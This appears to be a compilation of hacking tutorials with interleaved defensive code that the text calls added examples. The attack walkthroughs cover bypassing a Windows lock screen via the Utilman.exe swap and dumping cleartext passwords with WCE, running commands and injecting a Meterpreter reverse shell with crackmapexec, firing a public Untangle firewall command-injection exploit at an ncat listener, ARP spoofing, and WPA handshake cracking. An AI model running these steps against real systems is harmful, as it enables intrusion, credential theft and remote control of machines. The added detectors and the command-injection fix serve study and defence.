Hack Locked Workstation Password in Clear Text

For this tutorial we will be using the Kali Linux ISO, which can be found on its official website, and WCE (Windows Credentials Editor), which can be found at


Download the universal version if you don’t know the target system architecture (32 bit or 64 bit).

Windows Credentials Editor (WCE) is a security tool to list logon sessions and add, change, list and delete their associated credentials (e.g. LM/NT hashes, plaintext passwords and Kerberos tickets).


First of all, make your pen drive bootable with Kali Linux (any other Linux distro will do), copy wce.exe to the pen drive, then boot the target system from the pen drive and choose the Live boot option from the boot menu.


Once the OS has booted, open the File Manager, go to Other Locations and choose the 16 GB volume (the size of the Windows installation, which will be different in your case).


Now browse to the Windows/System32 folder.


Now rename Utilman.exe to any other name, then rename cmd.exe to Utilman.exe.


Now restart the system, but this time do not boot into Kali Linux; let it boot into the installed Windows. After choosing a user you will be presented with the password screen.


At the password screen, a blue Ease of Access icon is present in the lower left corner. Click it and a command window opens.


Now you have to execute the wce.exe file on the pen drive, so first find out which external devices are connected. Type:
diskpart  (a Windows command-line utility for managing disks and partitions)
and then at the diskpart prompt type:
list volume  (shows all the connected drives)
Now choose the drive whose file system type is FAT32 (to be sure, also confirm the drive by matching the size of your pen drive).
In my case it is F. Now exit diskpart by pressing Ctrl+C.


So now browse to the pen drive by typing its drive letter: f:  (here f is the drive letter; in your case it could be different), and then execute the wce.exe file you copied previously with the command:
wce.exe -w  (-w dumps all the passwords in clear text)
As you can see, it has successfully dumped the password in clear text.
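The renamed Utilman.exe is easy to spot after the fact: a genuine accessibility helper never has the same contents as cmd.exe. The Python check below is an added example, not code from the original article or from WCE. It builds a constructed stand-in for System32 in a temporary directory (on a real machine you would point `find_swapped_accessibility_binaries` at C:\Windows\System32) and reports any accessibility helper whose SHA-256 equals that of cmd.exe. The swap only works because the unencrypted disk can be edited offline, so full-disk encryption is the preventive control; this script is the detective one.

```python
import hashlib
import tempfile
from pathlib import Path

# Accessibility helpers the logon screen can launch before anyone authenticates;
# any of them swapped for cmd.exe yields a SYSTEM shell at the password prompt.
ACCESSIBILITY_BINARIES = {
    "utilman.exe", "sethc.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
}


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def find_swapped_accessibility_binaries(system32: Path) -> list[str]:
    """Return the accessibility binaries under `system32` whose content is
    byte-identical to cmd.exe. A legitimate Utilman.exe never hashes the same
    as cmd.exe, so a match means the file was replaced or renamed over."""
    cmd = system32 / "cmd.exe"
    if not cmd.is_file():
        raise FileNotFoundError(f"no cmd.exe under {system32}")
    cmd_hash = sha256_of(cmd)
    swapped = []
    for entry in system32.iterdir():
        name = entry.name.lower()  # NTFS file names are case-insensitive
        if name in ACCESSIBILITY_BINARIES and entry.is_file():
            if sha256_of(entry) == cmd_hash:
                swapped.append(entry.name)
    return sorted(swapped)


def build_demo_system32() -> Path:
    """Constructed stand-in for C:\\Windows\\System32 (assumption: not a real
    Windows directory): a cmd.exe, a genuine-looking sethc.exe, the original
    Utilman renamed aside, and a Utilman.exe that is really a copy of cmd.exe."""
    root = Path(tempfile.mkdtemp(prefix="system32_demo_"))
    fake_cmd = b"MZ" + b"\x00" * 62 + b"constructed cmd.exe body"
    (root / "cmd.exe").write_bytes(fake_cmd)
    (root / "sethc.exe").write_bytes(b"MZ" + b"\x00" * 62 + b"constructed sethc body")
    (root / "Utilman_old.exe").write_bytes(b"MZ" + b"\x00" * 62 + b"original utilman")
    (root / "Utilman.exe").write_bytes(fake_cmd)  # the swap from the walkthrough
    return root


if __name__ == "__main__":
    demo = build_demo_system32()
    print(find_swapped_accessibility_binaries(demo))  # ['Utilman.exe']
```

A hash comparison against cmd.exe catches exactly the rename trick shown here; comparing each helper against a known-good hash from a clean install of the same Windows build catches replacement with any other binary as well.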

Penetration Testing in Windows/Active Directory with Crackmapexec

Crackmapexec is a Swiss Army knife for pentesting Windows/Active Directory environments. Active Directory (AD) is a directory service that Microsoft developed for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services.

First of all, to install crackmapexec run the following commands:
apt-get install -y libssl-dev libffi-dev python-dev build-essential

I have already installed all the requirements, which is why it shows them as already installed, but you have to install them.
Now we will create a virtual environment for crackmapexec with virtualenvwrapper.
virtualenvwrapper is a set of extensions to the virtualenv tool. The extensions include wrappers for creating and deleting virtual environments and otherwise managing your development workflow, making it easier to work on more than one project at a time without introducing conflicts in their dependencies.
apt-get install virtualenvwrapper
source /usr/share/virtualenvwrapper/virtualenvwrapper.sh
mkvirtualenv CME
pip install git+https://github.com/CoreSecurity/impacket
pip install crackmapexec


Now, to execute a Windows command remotely, run the following command:

crackmapexec 192.168.0.104 -u administrator -p 'Igni*******' -x whoami

As you can see, the server is Pwned and the output of the command is rajlab\administrator.
Here 192.168.0.104 is the IP of the server running the Active Directory service in the network.
We can also execute a PowerShell command:

crackmapexec 192.168.0.104 -u administrator -p 'Igni*******' -X '$PSVersionTable'

The command is executed successfully and the output shows the PowerShell version.
If we don't know which host is the Active Directory server, we can run crackmapexec against the whole network by giving the network range, in my case 192.168.0.0/24.
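Running crackmapexec across a whole range shows up on the receiving side as a burst of network logons from one source IP to many hosts in a short time. The detection below is an added example, not part of the article or of crackmapexec. The event records are constructed (timestamp, host, Windows event ID 4624 = successful logon, logon type 3 = network logon, account, source IP), the article's 192.168.0.132 is reused as the source, and the threshold of three distinct hosts within sixty seconds is an assumed tuning value.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security log records flattened to the fields a SIEM
# exposes: (time, host, event_id, logon_type, account, source_ip).
# 4624 = successful logon; logon type 3 = network (SMB, WMI, RPC), which is
# the kind of session a remote command execution tool opens.
SAMPLE_EVENTS = [
    ("2017-03-01 10:00:01", "DC01",  4624, 3, "administrator", "192.168.0.132"),
    ("2017-03-01 10:00:02", "FS01",  4624, 3, "administrator", "192.168.0.132"),
    ("2017-03-01 10:00:02", "WS-07", 4624, 3, "administrator", "192.168.0.132"),
    ("2017-03-01 10:00:04", "WS-12", 4624, 3, "administrator", "192.168.0.132"),
    ("2017-03-01 10:00:05", "WS-19", 4624, 3, "administrator", "192.168.0.132"),
    ("2017-03-01 10:03:00", "FS01",  4624, 3, "j.doe",         "192.168.0.50"),
    ("2017-03-01 10:15:00", "WS-07", 4624, 2, "j.doe",         "192.168.0.50"),  # interactive, ignored
    ("2017-03-01 11:00:00", "DC01",  4624, 3, "svc_backup",    "192.168.0.9"),
    ("2017-03-01 11:30:00", "FS01",  4624, 3, "svc_backup",    "192.168.0.9"),   # same source, outside window
]


def detect_auth_sweep(events, min_hosts=3, window=timedelta(seconds=60)):
    """Flag source IPs that complete network logons to at least `min_hosts`
    distinct hosts within `window`. Returns {source_ip: {"account", "hosts"}}
    for the first window per source that crosses the threshold."""
    per_src = defaultdict(list)
    for ts, host, event_id, logon_type, account, src in events:
        if event_id != 4624 or logon_type != 3:
            continue
        per_src[src].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), host, account))

    findings = {}
    for src, records in per_src.items():
        records.sort()  # time order; sliding window below relies on it
        start = 0
        for end in range(len(records)):
            while records[end][0] - records[start][0] > window:
                start += 1
            hosts = {h for _, h, _ in records[start:end + 1]}
            if len(hosts) >= min_hosts:
                findings[src] = {"account": records[end][2], "hosts": sorted(hosts)}
                break
    return findings


if __name__ == "__main__":
    for src, info in detect_auth_sweep(SAMPLE_EVENTS).items():
        print(f"{src} authenticated as {info['account']} to {info['hosts']}")
```

The backup service account in the sample touches two hosts thirty minutes apart and is not flagged; the sweep source hits three hosts within two seconds and is. In a real environment the threshold and window need tuning against management hosts that legitimately fan out, and the same logic applies to failed logons (event 4625) for password spraying.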



Now it is time to get a Meterpreter shell, so start Metasploit with the msfconsole command in a new terminal and set up the reverse handler:
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.0.132
set lport 444
exploit



Now, in the previous terminal, run the command:
crackmapexec 192.168.0.104 -u administrator -p Ign******* -M metinject -o LHOST=192.168.0.132 LPORT=444
As you can see, the payload is executed successfully: the metinject module runs the PowerShell script Invoke-Shellcode.ps1 to inject Meterpreter directly into memory and get the reverse Meterpreter shell.
Here -M is the module to use and -o sets the module's options.


As you can see we got the meterpreter shell.


Author: Himanshu Gupta is an InfoSec Researcher and Technical Writer. You can follow him on LinkedIn.

Hack Untangle NG Firewall using command Injection Vulnerability

Untangle’s NG Firewall enables us to quickly and easily create the network policies that deliver the perfect balance between security and productivity.

Untangle NGFW <= v12.1.0 beta execEvil() authenticated root command injection (CI) exploit. A command injection vulnerability exists in Untangle NG Firewall which allows non-root authenticated users to execute system commands with root privileges. This exploit has been tested on Untangle NG Firewall versions 11.2, 12, 12.0.1 and 12.1.0 beta, but should work on previous versions. The client-side sanitisation issues identified in the disclosure post can be exploited with a web app proxy.

First of all, clone the GitHub repo of the exploit and enter the directory with the command:
git clone https://github.com/3xocyte/Exploits && cd Exploits

and now give the python script permission to execute with command:


chmod +x untangle-ngfw-12.1-ci.py


Now set up a netcat listener on port 443 for the SSL connection in a new terminal with the command:

ncat  --ssl  -nlvp 443


Now execute the Python script with the command:

python untangle-ngfw-12.1-ci.py 192.168.2.1 192.168.2.3 admin admin

Here 192.168.2.1 is the Untangle firewall IP, 192.168.2.3 is our system IP, and the username and password of the Untangle firewall are admin and admin.


As soon as the above command is successfully executed we get the reverse shell.
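The root cause described above is input that reaches a shell after only client-side checks. The Python below is an added illustration of that bug class and its fix; it is not Untangle's execEvil() code and makes no claim about how that function is written. `run_vulnerable` interpolates the input into a shell command string, while `run_hardened` validates it server-side against a hostname allowlist and passes it as a single argv element so no shell ever parses it. The `echo` command stands in for whatever the real handler runs, and the test input is constructed.

```python
import re
import subprocess

# Server-side allowlist for a hostname field: letters, digits, dots and hyphens,
# bounded in length. Anything else is refused before it reaches a process.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def run_vulnerable(user_input: str) -> str:
    """The bug class: user input pasted into a command line handed to /bin/sh.
    The command itself is a harmless echo; the problem is the second command
    the shell happily runs after the ';'."""
    cmd = f"echo resolving {user_input}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_hardened(user_input: str) -> str:
    """Validate on the server (client-side checks can be bypassed with a proxy,
    as the disclosure notes) and pass the value as one argv element, so shell
    metacharacters are either rejected or delivered literally, never parsed."""
    if not HOSTNAME_RE.fullmatch(user_input):
        raise ValueError(f"rejected input: {user_input!r}")
    return subprocess.run(["echo", "resolving", user_input],
                          capture_output=True, text=True).stdout


def demo():
    """Run both handlers on a constructed injection attempt and return
    (vulnerable_output, hardened_result)."""
    payload = "example.com; echo INJECTED"  # constructed test input
    vulnerable_output = run_vulnerable(payload)
    try:
        hardened_result = run_hardened(payload)
    except ValueError as exc:
        hardened_result = str(exc)
    return vulnerable_output, hardened_result


if __name__ == "__main__":
    vuln, hard = demo()
    print("vulnerable:", repr(vuln))  # second line 'INJECTED' came from the injected command
    print("hardened:  ", hard)
```

The hardened version needs both halves: the argv list alone would still let an attacker smuggle option-looking arguments to some programs, and the allowlist alone would still be one refactor away from a shell string. Running the handler with the least privilege it needs, rather than as root, limits what any remaining injection can do.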


How to Detect Sniffer in Your Network

Xarp is an advanced anti-spoofing tool that flags spoofing attacks that use ARP (Address Resolution Protocol) against your system. This covers documents, emails and VoIP conversations. ARP attacks allow a hacker to manipulate the data sent over the network. Xarp uses active and passive modules to detect hackers inside the network. Having such a tool on the system is very important, as computer firewalls and OS security do not provide protection against ARP attacks.

Download latest Xarp version from http://xarp.software.informer.com/download/


After it has downloaded, install it on your computer. To show the tool's effectiveness, we now perform an ARP attack on a system with Xarp installed, using Bettercap.


As soon as Xarp detects an ARP attack, it shows an alert on the screen like this.



It is to be noted that there was no alert or blocking from either Windows Firewall or Defender, but Xarp detects the intrusion and warns about it.
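To make concrete what a passive ARP monitor like Xarp watches for, here is an added Python example (not Xarp's or Bettercap's code) that applies the core rule to a constructed sequence of ARP replies: remember the MAC first seen for each IP and alert when a later reply rebinds that IP to a different MAC, and alert again when one MAC claims several IPs, which is what a man-in-the-middle poisoning both a host and the gateway produces. The addresses and timestamps are constructed.

```python
from collections import defaultdict

# Constructed ARP replies as a passive sensor on the LAN would see them:
# (seconds since start, claimed IP, claimed MAC). The gateway 192.168.1.1 is
# legitimately at aa:bb:cc:00:00:01; from t=120 a second MAC starts claiming it
# and then also claims the host 192.168.1.20.
SAMPLE_ARP_REPLIES = [
    (0,   "192.168.1.1",  "aa:bb:cc:00:00:01"),
    (30,  "192.168.1.20", "aa:bb:cc:00:00:20"),
    (60,  "192.168.1.1",  "aa:bb:cc:00:00:01"),
    (90,  "192.168.1.21", "aa:bb:cc:00:00:21"),
    (120, "192.168.1.1",  "DE:AD:BE:EF:00:99"),  # poisoned reply for the gateway
    (121, "192.168.1.20", "de:ad:be:ef:00:99"),  # same MAC now claims a host too
    (150, "192.168.1.1",  "de:ad:be:ef:00:99"),
]


def detect_arp_spoofing(replies):
    """Passive ARP inspection: the first IP->MAC binding seen is taken as the
    baseline; a reply that rebinds the IP raises 'ip-mac-change', and a MAC
    that ends up bound to more than one IP raises 'mac-claims-multiple-ips'
    once. Returns the list of alerts in the order they were raised."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    reported_macs = set()
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()  # normalise so case differences do not hide a match
        baseline = ip_to_mac.setdefault(ip, mac)
        if baseline != mac:
            alerts.append({"t": ts, "type": "ip-mac-change",
                           "ip": ip, "was": baseline, "now": mac})
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1 and mac not in reported_macs:
            reported_macs.add(mac)
            alerts.append({"t": ts, "type": "mac-claims-multiple-ips",
                           "mac": mac, "ips": sorted(mac_to_ips[mac])})
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_ARP_REPLIES):
        print(alert)
```

A real deployment seeds the baseline from a trusted source (static entries or a DHCP lease table) instead of trusting the first reply seen, since a poisoned reply could itself be first, and it should expect legitimate rebinding after a NIC replacement or a DHCP lease change; the active module Xarp also has sends its own requests to confirm which MAC actually answers for an IP.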

Author: Shivam Yadav is a certified ethical hacker, an enthusiast and a researcher in this field.

3 Ways to Crack Wifi using Pyrit, oclHashcat and Cowpatty

First, start monitor mode on the wireless adapter:
airmon-ng start wlan0
Now monitor mode is enabled on the interface named wlan0mon.
Then start listening for all the available Wi-Fi networks with the following command:

airodump-ng wlan0mon


After running the above command it will start listening to all the Wi-Fi traffic nearby, so wait till your target appears and then hit Ctrl+C.
Now we have to listen on the specific channel on which the target is present. Run the command:
airodump-ng -c 2 --bssid 3C:1E:04:XX:XX:XX --write sommay wlan0mon
-c == channel number of the target (2 in my case, see the CH column)
--bssid == MAC address of the target AP
--write == name of the capture file


Now wait till the WPA handshake is captured and then hit Ctrl+C.
A file named sommay-01.cap will be generated.


PYRIT

The first method to crack the password from the capture file is Pyrit. We will use a dictionary attack, so run the command:
pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough
-i == path to the input file, in our case the dictionary
-r == path to the capture file (in our case sommay-01.cap)
attack_passthrough == specifies that a dictionary attack is to be performed
As you can see, it has successfully cracked the password.



OCLHASHCAT

First of all, download oclHashcat from its official website: https://hashcat.net/files/hashcat-2.00.7z
Next we have to convert the .cap file captured earlier with airodump-ng to .hccap with aircrack-ng, using the command:
aircrack-ng sommay-01.cap -J sommay-01
-J == path to the output file, which gets the extension .hccap




Now copy the dictionary you want to use into the Hashcat folder.
Then enter the Hashcat folder and run the command:
./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst
In the above command, if you are using a 32-bit system replace 64 with 32.
-m is the hash type, which is 2500 for WPA/WPA2 cracking;
then comes the path to the .hccap file you converted with aircrack-ng,
and then the name of the dictionary file.
As you can see, it has successfully cracked the password.


coWPAtty

For cracking with the help of coWPAtty we first have to generate a hash file specific to the target AP. For this we use genpmk, so run the command:
genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY
-f == path to the dictionary file
-d == name of the output dictionary
-s == ESSID (name) of the target AP (it must be identical to the target AP's)
It will generate a dictionary file named cowpatty_dict, which speeds up the cracking process.


Now run the command:
cowpatty -d cowpatty_dict -r sommay-01.cap -s SOMMAY
-d == path to the dictionary we generated with genpmk
-r == path to the capture file we generated with airodump-ng
-s == ESSID of the target AP (it must be identical to the target AP's)
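All three tools do the same expensive work for every dictionary word, and genpmk's speed-up comes from doing it once per ESSID and storing the result. The added Python example below (not from the article, Pyrit, Hashcat or coWPAtty) derives the WPA2 PMK as IEEE 802.11i specifies, PBKDF2-HMAC-SHA1 with the ESSID as salt and 4096 iterations, builds a genpmk-style table from a constructed word list, and shows that such a table only helps against the ESSID it was built for. The ESSID SOMMAY is the article's; the word list and the sample passphrases are constructed.

```python
import hashlib


def wpa2_pmk(essid: str, passphrase: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 iterations, 32 bytes),
    per IEEE 802.11i. Every candidate in a dictionary attack must go through
    these 4096 iterations; the captured handshake is only needed afterwards,
    to confirm which PMK produced the observed message integrity code."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2 passphrases are 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def precompute_pmk_table(essid: str, wordlist) -> dict:
    """What genpmk does for one ESSID: derive the PMK for each usable word once,
    so any number of handshakes from that network are checked by lookup.
    Words outside the 8-63 character range can never be WPA2 passphrases."""
    return {word: wpa2_pmk(essid, word) for word in wordlist if 8 <= len(word) <= 63}


def recover_from_table(table: dict, pmk: bytes):
    """Return the dictionary word whose precomputed PMK equals `pmk`, or None.
    A None result against a full-sized list is the property a defender wants."""
    for word, candidate in table.items():
        if candidate == pmk:
            return word
    return None


# Constructed word list standing in for passwords.lst from the article.
CONSTRUCTED_WORDLIST = ["password", "12345678", "letmein1", "qwerty", "sommay2017"]

if __name__ == "__main__":
    table = precompute_pmk_table("SOMMAY", CONSTRUCTED_WORDLIST)
    weak = wpa2_pmk("SOMMAY", "12345678")        # passphrase present in the list
    strong = wpa2_pmk("SOMMAY", "Hk7#vq2Lp9!zR4mW")  # constructed random passphrase
    print("weak ->", recover_from_table(table, weak))      # 12345678
    print("strong ->", recover_from_table(table, strong))  # None
    # the same table is useless against another network name
    print("other ESSID ->", recover_from_table(table, wpa2_pmk("OTHER", "12345678")))  # None
```

Two things follow for anyone running a WPA2 network: the only defence against this attack is a passphrase that is not in any word list, since the handshake can always be captured passively, and a network name that is not a common default forces an attacker to rebuild the table rather than reuse one computed in advance.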